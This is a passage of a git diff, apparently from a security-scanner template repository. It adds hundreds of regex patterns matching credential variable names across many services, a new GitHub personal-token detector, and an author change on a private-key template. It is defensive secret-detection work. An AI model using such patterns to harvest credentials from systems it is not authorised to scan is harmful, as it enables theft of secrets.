+          - "(?i)ossrh[_-]?secret(=| =|:| :)"
+          - "(?i)ossrh[_-]?password(=| =|:| :)"
+          - "(?i)ossrh[_-]?pass(=| =|:| :)"
+          - "(?i)ossrh[_-]?jira[_-]?password(=| =|:| :)"
+          - "(?i)os[_-]?password(=| =|:| :)"
+          - "(?i)os[_-]?auth[_-]?url(=| =|:| :)"
+          - "(?i)org[_-]?project[_-]?gradle[_-]?sonatype[_-]?nexus[_-]?password(=| =|:| :)"
+          - "(?i)org[_-]?gradle[_-]?project[_-]?sonatype[_-]?nexus[_-]?password(=| =|:| :)"
+          - "(?i)openwhisk[_-]?key(=| =|:| :)"
+          - "(?i)open[_-]?whisk[_-]?key(=| =|:| :)"
+          - "(?i)onesignal[_-]?user[_-]?auth[_-]?key(=| =|:| :)"
+          - "(?i)onesignal[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)omise[_-]?skey(=| =|:| :)"
+          - "(?i)omise[_-]?pubkey(=| =|:| :)"
+          - "(?i)omise[_-]?pkey(=| =|:| :)"
+          - "(?i)omise[_-]?key(=| =|:| :)"
+          - "(?i)okta[_-]?oauth2[_-]?clientsecret(=| =|:| :)"
+          - "(?i)okta[_-]?oauth2[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)okta[_-]?client[_-]?token(=| =|:| :)"
+          - "(?i)ofta[_-]?secret(=| =|:| :)"
+          - "(?i)ofta[_-]?region(=| =|:| :)"
+          - "(?i)ofta[_-]?key(=| =|:| :)"
+          - "(?i)octest[_-]?password(=| =|:| :)"
+          - "(?i)octest[_-]?app[_-]?username(=| =|:| :)"
+          - "(?i)octest[_-]?app[_-]?password(=| =|:| :)"
+          - "(?i)oc[_-]?pass(=| =|:| :)"
+          - "(?i)object[_-]?store[_-]?creds(=| =|:| :)"
+          - "(?i)object[_-]?store[_-]?bucket(=| =|:| :)"
+          - "(?i)object[_-]?storage[_-]?region[_-]?name(=| =|:| :)"
+          - "(?i)object[_-]?storage[_-]?password(=| =|:| :)"
+          - "(?i)oauth[_-]?token(=| =|:| :)"
+          - "(?i)numbers[_-]?service[_-]?pass(=| =|:| :)"
+          - "(?i)nuget[_-]?key(=| =|:| :)"
+          - "(?i)nuget[_-]?apikey(=| =|:| :)"
+          - "(?i)nuget[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)npm[_-]?token(=| =|:| :)"
+          - "(?i)npm[_-]?secret[_-]?key(=| =|:| :)"
+          - "(?i)npm[_-]?password(=| =|:| :)"
+          - "(?i)npm[_-]?email(=| =|:| :)"
+          - "(?i)npm[_-]?auth[_-]?token(=| =|:| :)"
+          - "(?i)npm[_-]?api[_-]?token(=| =|:| :)"
+          - "(?i)npm[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)now[_-]?token(=| =|:| :)"
+          - "(?i)non[_-]?token(=| =|:| :)"
+          - "(?i)node[_-]?pre[_-]?gyp[_-]?secretaccesskey(=| =|:| :)"
+          - "(?i)node[_-]?pre[_-]?gyp[_-]?github[_-]?token(=| =|:| :)"
+          - "(?i)node[_-]?pre[_-]?gyp[_-]?accesskeyid(=| =|:| :)"
+          - "(?i)node[_-]?env(=| =|:| :)"
+          - "(?i)ngrok[_-]?token(=| =|:| :)"
+          - "(?i)ngrok[_-]?auth[_-]?token(=| =|:| :)"
+          - "(?i)nexuspassword(=| =|:| :)"
+          - "(?i)nexus[_-]?password(=| =|:| :)"
+          - "(?i)new[_-]?relic[_-]?beta[_-]?token(=| =|:| :)"
+          - "(?i)netlify[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)nativeevents(=| =|:| :)"
+          - "(?i)mysqlsecret(=| =|:| :)"
+          - "(?i)mysqlmasteruser(=| =|:| :)"
+          - "(?i)mysql[_-]?username(=| =|:| :)"
+          - "(?i)mysql[_-]?user(=| =|:| :)"
+          - "(?i)mysql[_-]?root[_-]?password(=| =|:| :)"
+          - "(?i)mysql[_-]?password(=| =|:| :)"
+          - "(?i)mysql[_-]?hostname(=| =|:| :)"
+          - "(?i)mysql[_-]?database(=| =|:| :)"
+          - "(?i)my[_-]?secret[_-]?env(=| =|:| :)"
+          - "(?i)multi[_-]?workspace[_-]?sid(=| =|:| :)"
+          - "(?i)multi[_-]?workflow[_-]?sid(=| =|:| :)"
+          - "(?i)multi[_-]?disconnect[_-]?sid(=| =|:| :)"
+          - "(?i)multi[_-]?connect[_-]?sid(=| =|:| :)"
+          - "(?i)multi[_-]?bob[_-]?sid(=| =|:| :)"
+          - "(?i)minio[_-]?secret[_-]?key(=| =|:| :)"
+          - "(?i)minio[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)mile[_-]?zero[_-]?key(=| =|:| :)"
+          - "(?i)mh[_-]?password(=| =|:| :)"
+          - "(?i)mh[_-]?apikey(=| =|:| :)"
+          - "(?i)mg[_-]?public[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)mg[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)mapboxaccesstoken(=| =|:| :)"
+          - "(?i)mapbox[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)mapbox[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
+          - "(?i)mapbox[_-]?api[_-]?token(=| =|:| :)"
+          - "(?i)mapbox[_-]?access[_-]?token(=| =|:| :)"
+          - "(?i)manifest[_-]?app[_-]?url(=| =|:| :)"
+          - "(?i)manifest[_-]?app[_-]?token(=| =|:| :)"
+          - "(?i)mandrill[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)managementapiaccesstoken(=| =|:| :)"
+          - "(?i)management[_-]?token(=| =|:| :)"
+          - "(?i)manage[_-]?secret(=| =|:| :)"
+          - "(?i)manage[_-]?key(=| =|:| :)"
+          - "(?i)mailgun[_-]?secret[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)mailgun[_-]?pub[_-]?key(=| =|:| :)"
+          - "(?i)mailgun[_-]?pub[_-]?apikey(=| =|:| :)"
+          - "(?i)mailgun[_-]?priv[_-]?key(=| =|:| :)"
+          - "(?i)mailgun[_-]?password(=| =|:| :)"
+          - "(?i)mailgun[_-]?apikey(=| =|:| :)"
+          - "(?i)mailgun[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)mailer[_-]?password(=| =|:| :)"
+          - "(?i)mailchimp[_-]?key(=| =|:| :)"
+          - "(?i)mailchimp[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)mail[_-]?password(=| =|:| :)"
+          - "(?i)magento[_-]?password(=| =|:| :)"
+          - "(?i)magento[_-]?auth[_-]?username (=| =|:| :)"
+          - "(?i)magento[_-]?auth[_-]?password(=| =|:| :)"
+          - "(?i)lottie[_-]?upload[_-]?cert[_-]?key[_-]?store[_-]?password(=| =|:| :)"
+          - "(?i)lottie[_-]?upload[_-]?cert[_-]?key[_-]?password(=| =|:| :)"
+          - "(?i)lottie[_-]?s3[_-]?secret[_-]?key(=| =|:| :)"
+          - "(?i)lottie[_-]?happo[_-]?secret[_-]?key(=| =|:| :)"
+          - "(?i)lottie[_-]?happo[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)looker[_-]?test[_-]?runner[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)ll[_-]?shared[_-]?key(=| =|:| :)"
+          - "(?i)ll[_-]?publish[_-]?url(=| =|:| :)"
+          - "(?i)linux[_-]?signing[_-]?key(=| =|:| :)"
+          - "(?i)linkedin[_-]?client[_-]?secretor lottie[_-]?s3[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)lighthouse[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)lektor[_-]?deploy[_-]?username(=| =|:| :)"
+          - "(?i)lektor[_-]?deploy[_-]?password(=| =|:| :)"
+          - "(?i)leanplum[_-]?key(=| =|:| :)"
+          - "(?i)kxoltsn3vogdop92m(=| =|:| :)"
+          - "(?i)kubeconfig(=| =|:| :)"
+          - "(?i)kubecfg[_-]?s3[_-]?path(=| =|:| :)"
+          - "(?i)kovan[_-]?private[_-]?key(=| =|:| :)"
+          - "(?i)keystore[_-]?pass(=| =|:| :)"
+          - "(?i)kafka[_-]?rest[_-]?url(=| =|:| :)"
+          - "(?i)kafka[_-]?instance[_-]?name(=| =|:| :)"
+          - "(?i)kafka[_-]?admin[_-]?url(=| =|:| :)"
+          - "(?i)jwt[_-]?secret(=| =|:| :)"
+          - "(?i)jdbc:mysql(=| =|:| :)"
+          - "(?i)jdbc[_-]?host(=| =|:| :)"
+          - "(?i)jdbc[_-]?databaseurl(=| =|:| :)"
+          - "(?i)itest[_-]?gh[_-]?token(=| =|:| :)"
+          - "(?i)ios[_-]?docs[_-]?deploy[_-]?token(=| =|:| :)"
+          - "(?i)internal[_-]?secrets(=| =|:| :)"
+          - "(?i)integration[_-]?test[_-]?appid(=| =|:| :)"
+          - "(?i)integration[_-]?test[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)index[_-]?name(=| =|:| :)"
+          - "(?i)ij[_-]?repo[_-]?username(=| =|:| :)"
+          - "(?i)ij[_-]?repo[_-]?password(=| =|:| :)"
+          - "(?i)hub[_-]?dxia2[_-]?password(=| =|:| :)"
+          - "(?i)homebrew[_-]?github[_-]?api[_-]?token(=| =|:| :)"
+          - "(?i)hockeyapp[_-]?token(=| =|:| :)"
+          - "(?i)heroku[_-]?token(=| =|:| :)"
+          - "(?i)heroku[_-]?email(=| =|:| :)"
+          - "(?i)heroku[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)hb[_-]?codesign[_-]?key[_-]?pass(=| =|:| :)"
+          - "(?i)hb[_-]?codesign[_-]?gpg[_-]?pass(=| =|:| :)"
+          - "(?i)hab[_-]?key(=| =|:| :)"
+          - "(?i)hab[_-]?auth[_-]?token(=| =|:| :)"
+          - "(?i)grgit[_-]?user(=| =|:| :)"
+          - "(?i)gren[_-]?github[_-]?token(=| =|:| :)"
+          - "(?i)gradle[_-]?signing[_-]?password(=| =|:| :)"
+          - "(?i)gradle[_-]?signing[_-]?key[_-]?id(=| =|:| :)"
+          - "(?i)gradle[_-]?publish[_-]?secret(=| =|:| :)"
+          - "(?i)gradle[_-]?publish[_-]?key(=| =|:| :)"
+          - "(?i)gpg[_-]?secret[_-]?keys(=| =|:| :)"
+          - "(?i)gpg[_-]?private[_-]?key(=| =|:| :)"
+          - "(?i)gpg[_-]?passphrase(=| =|:| :)"
+          - "(?i)gpg[_-]?ownertrust(=| =|:| :)"
+          - "(?i)gpg[_-]?keyname(=| =|:| :)"
+          - "(?i)gpg[_-]?key[_-]?name(=| =|:| :)"
+          - "(?i)google[_-]?private[_-]?key(=| =|:| :)"
+          - "(?i)google[_-]?maps[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)google[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)google[_-]?client[_-]?id(=| =|:| :)"
+          - "(?i)google[_-]?client[_-]?email(=| =|:| :)"
+          - "(?i)google[_-]?account[_-]?type(=| =|:| :)"
+          - "(?i)gogs[_-]?password(=| =|:| :)"
+          - "(?i)gitlab[_-]?user[_-]?email(=| =|:| :)"
+          - "(?i)github[_-]?tokens(=| =|:| :)"
+          - "(?i)github[_-]?token(=| =|:| :)"
+          - "(?i)github[_-]?repo(=| =|:| :)"
+          - "(?i)github[_-]?release[_-]?token(=| =|:| :)"
+          - "(?i)github[_-]?pwd(=| =|:| :)"
+          - "(?i)github[_-]?password(=| =|:| :)"
+          - "(?i)github[_-]?oauth[_-]?token(=| =|:| :)"
+          - "(?i)github[_-]?oauth(=| =|:| :)"
+          - "(?i)github[_-]?key(=| =|:| :)"
+          - "(?i)github[_-]?hunter[_-]?username(=| =|:| :)"
+          - "(?i)github[_-]?hunter[_-]?token(=| =|:| :)"
+          - "(?i)github[_-]?deployment[_-]?token(=| =|:| :)"
+          - "(?i)github[_-]?deploy[_-]?hb[_-]?doc[_-]?pass(=| =|:| :)"
+          - "(?i)github[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)github[_-]?auth[_-]?token(=| =|:| :)"
+          - "(?i)github[_-]?auth(=| =|:| :)"
+          - "(?i)github[_-]?api[_-]?token(=| =|:| :)"
+          - "(?i)github[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)github[_-]?access[_-]?token(=| =|:| :)"
+          - "(?i)git[_-]?token(=| =|:| :)"
+          - "(?i)git[_-]?name(=| =|:| :)"
+          - "(?i)git[_-]?email(=| =|:| :)"
+          - "(?i)git[_-]?committer[_-]?name(=| =|:| :)"
+          - "(?i)git[_-]?committer[_-]?email(=| =|:| :)"
+          - "(?i)git[_-]?author[_-]?name(=| =|:| :)"
+          - "(?i)git[_-]?author[_-]?email(=| =|:| :)"
+          - "(?i)ghost[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)ghb[_-]?token(=| =|:| :)"
+          - "(?i)gh[_-]?unstable[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)gh[_-]?token(=| =|:| :)"
+          - "(?i)gh[_-]?repo[_-]?token(=| =|:| :)"
+          - "(?i)gh[_-]?oauth[_-]?token(=| =|:| :)"
+          - "(?i)gh[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?id(=| =|:| :)"
+          - "(?i)gh[_-]?next[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)gh[_-]?email(=| =|:| :)"
+          - "(?i)gh[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)gcs[_-]?bucket(=| =|:| :)"
+          - "(?i)gcr[_-]?password(=| =|:| :)"
+          - "(?i)gcloud[_-]?service[_-]?key(=| =|:| :)"
+          - "(?i)gcloud[_-]?project(=| =|:| :)"
+          - "(?i)gcloud[_-]?bucket(=| =|:| :)"
+          - "(?i)ftp[_-]?username(=| =|:| :)"
+          - "(?i)ftp[_-]?user(=| =|:| :)"
+          - "(?i)ftp[_-]?pw(=| =|:| :)"
+          - "(?i)ftp[_-]?password(=| =|:| :)"
+          - "(?i)ftp[_-]?login(=| =|:| :)"
+          - "(?i)ftp[_-]?host(=| =|:| :)"
+          - "(?i)fossa[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)flickr[_-]?api[_-]?secret(=| =|:| :)"
+          - "(?i)flickr[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)flask[_-]?secret[_-]?key(=| =|:| :)"
+          - "(?i)firefox[_-]?secret(=| =|:| :)"
+          - "(?i)firebase[_-]?token(=| =|:| :)"
+          - "(?i)firebase[_-]?project[_-]?develop(=| =|:| :)"
+          - "(?i)firebase[_-]?key(=| =|:| :)"
+          - "(?i)firebase[_-]?api[_-]?token(=| =|:| :)"
+          - "(?i)firebase[_-]?api[_-]?json(=| =|:| :)"
+          - "(?i)file[_-]?password(=| =|:| :)"
+          - "(?i)exp[_-]?password(=| =|:| :)"
+          - "(?i)eureka[_-]?awssecretkey(=| =|:| :)"
+          - "(?i)env[_-]?sonatype[_-]?password(=| =|:| :)"
+          - "(?i)env[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)env[_-]?secret(=| =|:| :)"
+          - "(?i)env[_-]?key(=| =|:| :)"
+          - "(?i)env[_-]?heroku[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)env[_-]?github[_-]?oauth[_-]?token(=| =|:| :)"
+          - "(?i)end[_-]?user[_-]?password(=| =|:| :)"
+          - "(?i)encryption[_-]?password(=| =|:| :)"
+          - "(?i)elasticsearch[_-]?password(=| =|:| :)"
+          - "(?i)elastic[_-]?cloud[_-]?auth(=| =|:| :)"
+          - "(?i)dsonar[_-]?projectkey(=| =|:| :)"
+          - "(?i)dsonar[_-]?login(=| =|:| :)"
+          - "(?i)droplet[_-]?travis[_-]?password(=| =|:| :)"
+          - "(?i)dropbox[_-]?oauth[_-]?bearer(=| =|:| :)"
+          - "(?i)doordash[_-]?auth[_-]?token(=| =|:| :)"
+          - "(?i)dockerhubpassword(=| =|:| :)"
+          - "(?i)dockerhub[_-]?password(=| =|:| :)"
+          - "(?i)docker[_-]?token(=| =|:| :)"
+          - "(?i)docker[_-]?postgres[_-]?url(=| =|:| :)"
+          - "(?i)docker[_-]?password(=| =|:| :)"
+          - "(?i)docker[_-]?passwd(=| =|:| :)"
+          - "(?i)docker[_-]?pass(=| =|:| :)"
+          - "(?i)docker[_-]?key(=| =|:| :)"
+          - "(?i)docker[_-]?hub[_-]?password(=| =|:| :)"
+          - "(?i)digitalocean[_-]?ssh[_-]?key[_-]?ids(=| =|:| :)"
+          - "(?i)digitalocean[_-]?ssh[_-]?key[_-]?body(=| =|:| :)"
+          - "(?i)digitalocean[_-]?access[_-]?token(=| =|:| :)"
+          - "(?i)dgpg[_-]?passphrase(=| =|:| :)"
+          - "(?i)deploy[_-]?user(=| =|:| :)"
+          - "(?i)deploy[_-]?token(=| =|:| :)"
+          - "(?i)deploy[_-]?secure(=| =|:| :)"
+          - "(?i)deploy[_-]?password(=| =|:| :)"
+          - "(?i)ddgc[_-]?github[_-]?token(=| =|:| :)"
+          - "(?i)ddg[_-]?test[_-]?email[_-]?pw(=| =|:| :)"
+          - "(?i)ddg[_-]?test[_-]?email(=| =|:| :)"
+          - "(?i)db[_-]?username(=| =|:| :)"
+          - "(?i)db[_-]?user(=| =|:| :)"
+          - "(?i)db[_-]?pw(=| =|:| :)"
+          - "(?i)db[_-]?password(=| =|:| :)"
+          - "(?i)db[_-]?host(=| =|:| :)"
+          - "(?i)db[_-]?database(=| =|:| :)"
+          - "(?i)db[_-]?connection(=| =|:| :)"
+          - "(?i)datadog[_-]?app[_-]?key(=| =|:| :)"
+          - "(?i)datadog[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)database[_-]?username(=| =|:| :)"
+          - "(?i)database[_-]?user(=| =|:| :)"
+          - "(?i)database[_-]?port(=| =|:| :)"
+          - "(?i)database[_-]?password(=| =|:| :)"
+          - "(?i)database[_-]?name(=| =|:| :)"
+          - "(?i)database[_-]?host(=| =|:| :)"
+          - "(?i)danger[_-]?github[_-]?api[_-]?token(=| =|:| :)"
+          - "(?i)cypress[_-]?record[_-]?key(=| =|:| :)"
+          - "(?i)coverity[_-]?scan[_-]?token(=| =|:| :)"
+          - "(?i)coveralls[_-]?token(=| =|:| :)"
+          - "(?i)coveralls[_-]?repo[_-]?token(=| =|:| :)"
+          - "(?i)coveralls[_-]?api[_-]?token(=| =|:| :)"
+          - "(?i)cos[_-]?secrets(=| =|:| :)"
+          - "(?i)conversation[_-]?username(=| =|:| :)"
+          - "(?i)conversation[_-]?password(=| =|:| :)"
+          - "(?i)contentful[_-]?v2[_-]?access[_-]?token(=| =|:| :)"
+          - "(?i)contentful[_-]?test[_-]?org[_-]?cma[_-]?token(=| =|:| :)"
+          - "(?i)contentful[_-]?php[_-]?management[_-]?test[_-]?token(=| =|:| :)"
+          - "(?i)contentful[_-]?management[_-]?api[_-]?access[_-]?token[_-]?new(=| =|:| :)"
+          - "(?i)contentful[_-]?management[_-]?api[_-]?access[_-]?token(=| =|:| :)"
+          - "(?i)contentful[_-]?integration[_-]?management[_-]?token(=| =|:| :)"
+          - "(?i)contentful[_-]?cma[_-]?test[_-]?token(=| =|:| :)"
+          - "(?i)contentful[_-]?access[_-]?token(=| =|:| :)"
+          - "(?i)consumerkey(=| =|:| :)"
+          - "(?i)consumer[_-]?key(=| =|:| :)"
+          - "(?i)conekta[_-]?apikey(=| =|:| :)"
+          - "(?i)coding[_-]?token(=| =|:| :)"
+          - "(?i)codecov[_-]?token(=| =|:| :)"
+          - "(?i)codeclimate[_-]?repo[_-]?token(=| =|:| :)"
+          - "(?i)codacy[_-]?project[_-]?token(=| =|:| :)"
+          - "(?i)cocoapods[_-]?trunk[_-]?token(=| =|:| :)"
+          - "(?i)cocoapods[_-]?trunk[_-]?email(=| =|:| :)"
+          - "(?i)cn[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)cn[_-]?access[_-]?key[_-]?id(=| =|:| :)"
+          - "(?i)clu[_-]?ssh[_-]?private[_-]?key[_-]?base64(=| =|:| :)"
+          - "(?i)clu[_-]?repo[_-]?url(=| =|:| :)"
+          - "(?i)cloudinary[_-]?url[_-]?staging(=| =|:| :)"
+          - "(?i)cloudinary[_-]?url(=| =|:| :)"
+          - "(?i)cloudflare[_-]?email(=| =|:| :)"
+          - "(?i)cloudflare[_-]?auth[_-]?key(=| =|:| :)"
+          - "(?i)cloudflare[_-]?auth[_-]?email(=| =|:| :)"
+          - "(?i)cloudflare[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)cloudant[_-]?service[_-]?database(=| =|:| :)"
+          - "(?i)cloudant[_-]?processed[_-]?database(=| =|:| :)"
+          - "(?i)cloudant[_-]?password(=| =|:| :)"
+          - "(?i)cloudant[_-]?parsed[_-]?database(=| =|:| :)"
+          - "(?i)cloudant[_-]?order[_-]?database(=| =|:| :)"
+          - "(?i)cloudant[_-]?instance(=| =|:| :)"
+          - "(?i)cloudant[_-]?database(=| =|:| :)"
+          - "(?i)cloudant[_-]?audited[_-]?database(=| =|:| :)"
+          - "(?i)cloudant[_-]?archived[_-]?database(=| =|:| :)"
+          - "(?i)cloud[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)clojars[_-]?password(=| =|:| :)"
+          - "(?i)client[_-]?secret(=| =|:| :)"
+          - "(?i)cli[_-]?e2e[_-]?cma[_-]?token(=| =|:| :)"
+          - "(?i)claimr[_-]?token(=| =|:| :)"
+          - "(?i)claimr[_-]?superuser(=| =|:| :)"
+          - "(?i)claimr[_-]?db(=| =|:| :)"
+          - "(?i)claimr[_-]?database(=| =|:| :)"
+          - "(?i)ci[_-]?user[_-]?token(=| =|:| :)"
+          - "(?i)ci[_-]?server[_-]?name(=| =|:| :)"
+          - "(?i)ci[_-]?registry[_-]?user(=| =|:| :)"
+          - "(?i)ci[_-]?project[_-]?url(=| =|:| :)"
+          - "(?i)ci[_-]?deploy[_-]?password(=| =|:| :)"
+          - "(?i)chrome[_-]?refresh[_-]?token(=| =|:| :)"
+          - "(?i)chrome[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)cheverny[_-]?token(=| =|:| :)"
+          - "(?i)cf[_-]?password(=| =|:| :)"
+          - "(?i)certificate[_-]?password(=| =|:| :)"
+          - "(?i)censys[_-]?secret(=| =|:| :)"
+          - "(?i)cattle[_-]?secret[_-]?key(=| =|:| :)"
+          - "(?i)cattle[_-]?agent[_-]?instance[_-]?auth(=| =|:| :)"
+          - "(?i)cattle[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)cargo[_-]?token(=| =|:| :)"
+          - "(?i)cache[_-]?s3[_-]?secret[_-]?key(=| =|:| :)"
+          - "(?i)bx[_-]?username(=| =|:| :)"
+          - "(?i)bx[_-]?password(=| =|:| :)"
+          - "(?i)bundlesize[_-]?github[_-]?token(=| =|:| :)"
+          - "(?i)built[_-]?branch[_-]?deploy[_-]?key(=| =|:| :)"
+          - "(?i)bucketeer[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)bucketeer[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
+          - "(?i)browserstack[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)browser[_-]?stack[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)brackets[_-]?repo[_-]?oauth[_-]?token(=| =|:| :)"
+          - "(?i)bluemix[_-]?username(=| =|:| :)"
+          - "(?i)bluemix[_-]?pwd(=| =|:| :)"
+          - "(?i)bluemix[_-]?password(=| =|:| :)"
+          - "(?i)bluemix[_-]?pass[_-]?prod(=| =|:| :)"
+          - "(?i)bluemix[_-]?pass(=| =|:| :)"
+          - "(?i)bluemix[_-]?auth(=| =|:| :)"
+          - "(?i)bluemix[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)bintraykey(=| =|:| :)"
+          - "(?i)bintray[_-]?token(=| =|:| :)"
+          - "(?i)bintray[_-]?key(=| =|:| :)"
+          - "(?i)bintray[_-]?gpg[_-]?password(=| =|:| :)"
+          - "(?i)bintray[_-]?apikey(=| =|:| :)"
+          - "(?i)bintray[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)b2[_-]?bucket(=| =|:| :)"
+          - "(?i)b2[_-]?app[_-]?key(=| =|:| :)"
+          - "(?i)awssecretkey(=| =|:| :)"
+          - "(?i)awscn[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)awscn[_-]?access[_-]?key[_-]?id(=| =|:| :)"
+          - "(?i)awsaccesskeyid(=| =|:| :)"
+          - "(?i)aws[_-]?ses[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)aws[_-]?ses[_-]?access[_-]?key[_-]?id(=| =|:| :)"
+          - "(?i)aws[_-]?secrets(=| =|:| :)"
+          - "(?i)aws[_-]?secret[_-]?key(=| =|:| :)"
+          - "(?i)aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)aws[_-]?secret(=| =|:| :)"
+          - "(?i)aws[_-]?key(=| =|:| :)"
+          - "(?i)aws[_-]?config[_-]?secretaccesskey(=| =|:| :)"
+          - "(?i)aws[_-]?config[_-]?accesskeyid(=| =|:| :)"
+          - "(?i)aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
+          - "(?i)aws[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)aws[_-]?access(=| =|:| :)"
+          - "(?i)author[_-]?npm[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)author[_-]?email[_-]?addr(=| =|:| :)"
+          - "(?i)auth0[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)auth0[_-]?api[_-]?clientsecret(=| =|:| :)"
+          - "(?i)auth[_-]?token(=| =|:| :)"
+          - "(?i)assistant[_-]?iam[_-]?apikey(=| =|:| :)"
+          - "(?i)artifacts[_-]?secret(=| =|:| :)"
+          - "(?i)artifacts[_-]?key(=| =|:| :)"
+          - "(?i)artifacts[_-]?bucket(=| =|:| :)"
+          - "(?i)artifacts[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)artifacts[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
+          - "(?i)artifactory[_-]?key(=| =|:| :)"
+          - "(?i)argos[_-]?token(=| =|:| :)"
+          - "(?i)apple[_-]?id[_-]?password(=| =|:| :)"
+          - "(?i)appclientsecret(=| =|:| :)"
+          - "(?i)app[_-]?token(=| =|:| :)"
+          - "(?i)app[_-]?secrete(=| =|:| :)"
+          - "(?i)app[_-]?report[_-]?token[_-]?key(=| =|:| :)"
+          - "(?i)app[_-]?bucket[_-]?perm(=| =|:| :)"
+          - "(?i)apigw[_-]?access[_-]?token(=| =|:| :)"
+          - "(?i)apiary[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)api[_-]?secret(=| =|:| :)"
+          - "(?i)api[_-]?key[_-]?sid(=| =|:| :)"
+          - "(?i)api[_-]?key[_-]?secret(=| =|:| :)"
+          - "(?i)api[_-]?key(=| =|:| :)"
+          - "(?i)aos[_-]?sec(=| =|:| :)"
+          - "(?i)aos[_-]?key(=| =|:| :)"
+          - "(?i)ansible[_-]?vault[_-]?password(=| =|:| :)"
+          - "(?i)android[_-]?docs[_-]?deploy[_-]?token(=| =|:| :)"
+          - "(?i)anaconda[_-]?token(=| =|:| :)"
+          - "(?i)amazon[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)amazon[_-]?bucket[_-]?name(=| =|:| :)"
+          - "(?i)alicloud[_-]?secret[_-]?key(=| =|:| :)"
+          - "(?i)alicloud[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)alias[_-]?pass(=| =|:| :)"
+          - "(?i)algolia[_-]?search[_-]?key[_-]?1(=| =|:| :)"
+          - "(?i)algolia[_-]?search[_-]?key(=| =|:| :)"
+          - "(?i)algolia[_-]?search[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)algolia[_-]?api[_-]?key[_-]?search(=| =|:| :)"
+          - "(?i)algolia[_-]?api[_-]?key[_-]?mcm(=| =|:| :)"
+          - "(?i)algolia[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)algolia[_-]?admin[_-]?key[_-]?mcm(=| =|:| :)"
+          - "(?i)algolia[_-]?admin[_-]?key[_-]?2(=| =|:| :)"
+          - "(?i)algolia[_-]?admin[_-]?key[_-]?1(=| =|:| :)"
+          - "(?i)adzerk[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)admin[_-]?email(=| =|:| :)"
+          - "(?i)account[_-]?sid(=| =|:| :)"
+          - "(?i)access[_-]?token(=| =|:| :)"
+          - "(?i)access[_-]?secret(=| =|:| :)"
+          - "(?i)access[_-]?key[_-]?secret(=| =|:| :)"
diff --git a/file/keys/github-personal-token.yaml b/file/keys/github-personal-token.yaml
new file mode 100644
index 0000000000..ac9983c6b6
--- /dev/null
+++ b/file/keys/github-personal-token.yaml
@@ -0,0 +1,16 @@
+id: github-personal-token
+
+info:
+  name: Github Personal Token
+  author: geeknik
+  severity: high
+  tags: token,file
+
+file:
+  - extensions:
+      - all
+
+    extractors:
+      - type: regex
+        regex:
+          - "ghp_.{36}"
diff --git a/file/keys/private-key.yaml b/file/keys/private-key.yaml
index 7149e7400e..3e779effd4 100644
--- a/file/keys/private-key.yaml
+++ b/file/keys/private-key.yaml
@@ -2,7 +2,7 @@ id: private-key
 
 info:
   name: Private Key Detect
-  author: gaurang
+  author: gaurang,geeknik
   severity: high
   tags: token,file
 
@@ -19,4 +19,6 @@ file:
